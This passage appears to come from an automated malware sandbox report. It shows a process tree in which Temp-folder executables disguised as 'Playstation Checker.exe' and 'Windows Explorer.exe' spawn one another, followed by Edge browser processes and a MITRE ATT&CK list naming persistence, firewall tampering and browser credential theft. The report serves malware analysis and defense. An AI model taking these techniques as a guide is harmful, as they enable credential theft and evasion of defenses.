        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        6⤵
        Checks computer location settings
        
        PID:7832
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        7⤵
        
        PID:8084
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        8⤵
        
        PID:8024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        9⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        7⤵
        
        PID:3128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:7856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffeaee746f8,0x7ffeaee74708,0x7ffeaee74718
  2⤵
  PID:5124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
  2⤵
  PID:7368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:8268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
  2⤵
  PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:5708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
  2⤵
  PID:3596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
  2⤵
  PID:6740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
  2⤵
  PID:6760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4800 /prefetch:8
  2⤵
  PID:5404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:1
  2⤵
  PID:7100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
  2⤵
  PID:7452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
  2⤵
  PID:8956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
  2⤵
  PID:8148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5720 /prefetch:8
  2⤵
  PID:5380
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4768 /prefetch:8
  2⤵
  PID:960
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4768 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1
  2⤵
  PID:7172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5747396117219107719,4596414194066526649,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
  2⤵
  PID:3900

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8616

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

Process Discovery

T1057

Query Registry

T1012

System Information Discovery